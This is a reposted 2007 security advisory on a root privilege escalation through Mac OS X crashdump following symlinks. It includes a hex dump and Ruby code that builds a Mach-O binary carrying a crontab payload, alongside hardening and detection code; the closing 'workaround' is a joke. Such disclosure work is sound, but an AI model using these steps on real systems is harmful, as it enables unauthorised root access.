SECURITYVULNS:DOC:15893
Jan 29, 2007

MOAB-28-01-2007: Apple crashdump Privilege Escalation Vulnerability

Source: vulners.com

Summary

The vendor (Apple) provides the following description of the software in its man page:

crashreporterd is the daemon responsible for detecting application crashes. crashreporterd listens for mach exceptions and when it detects a mach exception launches crashdump to investigate the crash and report it to the user.

crashdump is a helper tool used by the crashreporterd daemon to create crash reports and notify the user of application crashes. Users should not run crashdump manually. 

crashdump first tries to write reports into the user's home directory (/Users/[user]/Library/Logs/CrashReporter/) and, if that is not possible (e.g. because permissions do not allow it), falls back to the system-wide log directory (/Library/Logs/CrashReporter/).

The problem is that crashdump follows symlinks when writing the report, and members of the admin group have write access to /Library/Logs/CrashReporter/ (see the directory modes under 'Debugging information'). Because crashreporterd runs as root, planting a symlink in that directory, named after the application that will crash, makes crashdump write the report over any file on the system. The report contents can be steered by tampering with the Mach-O file of the crashing binary: the provided proof of concept puts its payload into a crafted library name, which crashdump copies into the report.

Exploiting this issue lets users in the admin group (unlike MOAB-22-01-2007, which is exploitable by any user) gain root privileges without any user interaction.
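To make the symlink-following write concrete, here is an added example, not code from the advisory and not Apple's crashdump source: a Ruby sketch of the kind of append that crashdump performs on the report path, beside a hardened variant that uses O_NOFOLLOW, O_APPEND and an fstat check on the open descriptor. The directory, application name and report text are assumptions passed in by the caller (the demo uses a temporary directory); nothing here touches /Library/Logs.

```ruby
# Added example (not the advisory's exploit and not Apple's crashdump code):
# the write pattern that makes a planted symlink in the report directory
# dangerous, beside a hardened version. dir/app/report are whatever the
# caller passes; the demo uses a temporary directory, never /Library/Logs.
require "tmpdir"

# Vulnerable pattern: a plain append open follows a symlink at the report
# path, so a report for app "vuln" lands wherever <dir>/vuln.crash.log
# points (in the advisory, a file only root may write).
# Returns the path the bytes really went to.
def write_report_unsafe(dir, app, report)
  path = File.join(dir, "#{app}.crash.log")
  File.open(path, "a") { |f| f.write(report) }
  File.realpath(path)
end

# Hardened pattern. O_NOFOLLOW makes the kernel refuse a symlink at the final
# path component (no lstat/open race), O_APPEND keeps report semantics, and
# fstat on the open descriptor rejects anything that is not a regular file
# owned by the writing user (a file pre-planted by another user, a FIFO, ...).
# Returns the path written, or nil when the write was refused.
def write_report_safe(dir, app, report)
  path = File.join(dir, "#{app}.crash.log")
  return nil if File.symlink?(path)            # early out; NOFOLLOW is the real guard
  flags = File::WRONLY | File::CREAT | File::APPEND
  flags |= File::NOFOLLOW if File.const_defined?(:NOFOLLOW)
  File.open(path, flags, 0o644) do |f|
    st = f.stat                                # fstat: describes what we actually opened
    return nil unless st.file? && st.uid == Process.euid
    f.write(report)
  end
  path
rescue Errno::ELOOP, Errno::EMLINK, Errno::ENOTDIR  # ELOOP on Linux, EMLINK on Mac OS X
  nil
end

if __FILE__ == $0
  Dir.mktmpdir do |dir|
    target = File.join(dir, "crontab")         # stands in for a root-owned file
    File.write(target, "# existing crontab\n")
    File.symlink(target, File.join(dir, "vuln.crash.log"))
    payload = "* * * * * /Users/Shared/r00t\n"
    puts "unsafe wrote to: #{write_report_unsafe(dir, 'vuln', payload)}"
    puts "safe result:     #{write_report_safe(dir, 'vuln', payload).inspect}"
    puts "target now:\n#{File.read(target)}"
  end
end
```

The uid check is what turns away a regular file an admin user pre-created in the directory when the writer runs as root; O_NOFOLLOW alone only covers the symlink case.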
Affected versions

Verified on Mac OS X 10.4.8 (8L2127).
Proof of concept, exploit or instructions to reproduce

The exploit uses a Mach-O binary with a crontab string injected into the name of one of its dylib load commands (the bytes are shown under 'Exploitation conditions'), both to trigger the issue and to demonstrate arbitrary code execution as root via crashdump.

$ ruby MOAB-28-01-2007.rb

See the 'Exploitation conditions' and 'Debugging information' sections below for further details.
Debugging information

The following output shows the privileges of the involved processes, the modes set on the relevant files and finally the crontab contents injected in the Mach-O binary:

$ ls -l /Library/Logs/
total 48
drwxrwxr-x 3 root admin 102 Jan 17 15:57 AppleFileService
drwxrwxr-x 3 root admin 102 Jan 14 20:26 Console
drwxrwxr-x 7 root admin 238 Jan 19 08:00 CrashReporter

$ strings /usr/libexec/crashreporterd | grep dump
failed to fork panicdump
panicdump
/usr/libexec/crashdump
crashdump[%d] exited with status %d
crashdump[%d] exited due to signal %d
/var/db/crashdump/%s.lock
crashdump
error writing to crashdump
error reading from crashdump. errno: %d
eof from crashdump
unexpected status from crashdump: %d

$ ps aux | grep reporterd | grep root
root 104 0.0 0.0 27764 232 ?? Ss 5:40PM 0:00.00 /usr/libexec/crashreporterd

$ file vuln
vuln: Mach-O executable i386
$ otool -L vuln
vuln:


* * * * * /Users/Shared/r00t
 (compatibility version 1.0.0, current version 88.3.4)

(The injected library name starts with two newlines and ends with one, so otool -L prints the crontab line on its own line, with the version information following on the next.)

Notes
Exploitation conditions

The bytes the exploit modifies are Mach-O load commands, located immediately after the LC_SEGMENT command for __LINKEDIT. The Mac OS X ABI Mach-O File Format Reference describes that segment as follows:

The __LINKEDIT segment contains raw data used by the dynamic linker, such as symbol, string, and relocation table entries. 

The crontab is not stored in the segment's data, though, but in the path string of an LC_LOAD_DYLIB command (cmd 0x0C), which is exactly what otool -L prints and what crashdump copies into the report. In the sample binary file (starting at offset 0x320):

38 00 00 00 5F 5F 4C 49 4E 4B 45 44 49 54 00 00 \
00 00 00 00 00 40 00 00 00 10 00 00 00 30 00 00 |-> LC_SEGMENT for __LINKEDIT
20 04 00 00 03 00 00 00 01 00 00 00 00 00 00 00 |   (cmdsize 0x38, segname, addresses, sizes, protections)
04 00 00 00 0E 00 00 00 1C 00 00 00 0C 00 00 00 /   segment flags, then LC_LOAD_DYLINKER (cmdsize 0x1C, name offset 0x0C)
2F 75 73 72 2F 6C 69 62 2F 64 79 6C 64 00 00 00 -> "/usr/lib/dyld"
0C 00 00 00 34 00 00 00 18 00 00 00 68 B7 9B 45 -> LC_LOAD_DYLIB (cmdsize 0x34, name offset 0x18, timestamp)
04 03 58 00 00 00 01 00 0A 0A 2A 20 2A 20 2A 20 \   current version 88.3.4, compatibility version 1.0.0, then the name:
2A 20 2A 20 2F 55 73 65 72 73 2F 53 68 61 72 65 |-> injected crontab "\n\n* * * * * /Users/Shared/r00t\n"
64 2F 72 30 30 74 0A 00 18 00 00 00 00 30 00 00 /

Note that the injected name is 32 bytes including its NUL, four more than the 28 bytes that cmdsize 0x34 leaves for it, so the string overruns into the space of the following load command. A C-string read from the name offset, which is what otool -L shows above, still returns it whole, but a crafted binary should normally grow cmdsize (and the header's sizeofcmds) to match.

Read the provided exploit source code for further details. Exploitation of the issue is straightforward.
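What the exploit relies on, as an added example rather than the MOAB-28-01-2007.rb source (which is not reproduced on this page): a Ruby script that constructs a minimal 32-bit Mach-O whose LC_LOAD_DYLIB name is the crontab string from the dump above, then walks the load commands the way otool -L and crashdump do, reading the name as a NUL-terminated C string. It also shows a triage check that flags install names that are not plain paths. The header fields (i386, MH_EXECUTE) and the absence of segments are assumptions made to keep the file minimal; the version and timestamp values are copied from the dump, and the constants are from <mach-o/loader.h>.

```ruby
# Added example: build a minimal 32-bit Mach-O with a crafted LC_LOAD_DYLIB
# name and parse it back the way otool -L / crashdump would see it.
# Constants are from <mach-o/loader.h>; the file layout is constructed here
# (header plus two load commands, no segments) and is not a runnable binary.

MH_MAGIC         = 0xfeedface  # 32-bit little-endian Mach-O
LC_LOAD_DYLINKER = 0x0e
LC_LOAD_DYLIB    = 0x0c
HEADER_SIZE      = 28          # struct mach_header
DYLIB_CMD_HDR    = 24          # struct dylib_command up to the name string

# Payload from the advisory's dump: two leading newlines break out of the
# report's library line, then a crontab entry that runs /Users/Shared/r00t.
CRONTAB_PAYLOAD = "\n\n* * * * * /Users/Shared/r00t\n"

# NUL-terminate and pad to a 4-byte boundary (load commands are 4-aligned).
def c_string(str)
  s = str + "\0"
  s + ("\0" * ((4 - s.bytesize % 4) % 4))
end

def load_dylinker_cmd(path)
  name = c_string(path)
  [LC_LOAD_DYLINKER, 12 + name.bytesize, 12].pack("L<3") + name
end

# Values default to the timestamp / versions seen in the dump (88.3.4, 1.0.0).
def load_dylib_cmd(name, timestamp: 0x459bb768, current: 0x00580304, compat: 0x00010000)
  s = c_string(name)
  [LC_LOAD_DYLIB, DYLIB_CMD_HDR + s.bytesize, DYLIB_CMD_HDR,
   timestamp, current, compat].pack("L<6") + s
end

# Header (CPU_TYPE_I386 = 7, subtype 3, MH_EXECUTE = 2) followed by the dyld
# load command and one LC_LOAD_DYLIB per name. cmdsize is sized to the name,
# unlike the advisory's binary, which leaves the original cmdsize in place.
def build_macho(dylib_names)
  cmds = load_dylinker_cmd("/usr/lib/dyld") + dylib_names.map { |n| load_dylib_cmd(n) }.join
  header = [MH_MAGIC, 7, 3, 2, 1 + dylib_names.size, cmds.bytesize, 0].pack("L<7")
  header + cmds
end

# Walk the load commands and return every LC_LOAD_DYLIB name. The name is
# read as a NUL-terminated C string from its offset, which is how otool -L
# prints it, so a name carrying newlines comes back verbatim.
def dylib_names(macho)
  raise "not a 32-bit little-endian Mach-O" unless macho.unpack1("L<") == MH_MAGIC
  ncmds = macho[16, 4].unpack1("L<")
  off = HEADER_SIZE
  names = []
  ncmds.times do
    chunk = macho[off, 8]
    raise "truncated load command at #{off}" if chunk.nil? || chunk.bytesize < 8
    cmd, cmdsize = chunk.unpack("L<2")
    raise "bad cmdsize at #{off}" if cmdsize < 8
    if cmd == LC_LOAD_DYLIB
      name_off = macho[off + 8, 4].unpack1("L<")
      names << macho[off + name_off, macho.bytesize].split("\0", 2).first
    end
    off += cmdsize
  end
  names
end

# Triage check: a legitimate install name is a path ('/...' or '@rpath/...')
# without control characters; anything else is worth a look.
def suspicious_dylib_names(macho)
  dylib_names(macho).reject { |n| n.match?(/\A[\/@][^[:cntrl:]]*\z/) }
end

if __FILE__ == $0
  bin = build_macho([CRONTAB_PAYLOAD, "/usr/lib/libSystem.B.dylib"])
  dylib_names(bin).each { |n| puts "dylib name: #{n.inspect}" }
  puts "suspicious: #{suspicious_dylib_names(bin).inspect}"
end
```

Run on a real binary, the same walk over the load commands (after checking the magic for the 64-bit and fat variants) is how to spot a crafted install name in a crash-report trigger before the report is written.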
Workaround or temporary solution

Wipe off Mac OS X and install MS-DOS. You can even play Winnie the Pooh in the Hundred Acre Wood with ultra modern graphics. OS X, instead, just has crappy chess and tic-tac-toe games. Seriously.

"Gimme back my Heffalump Army!" - Darth Pletora, during the Winnie the Pooh Doomsday.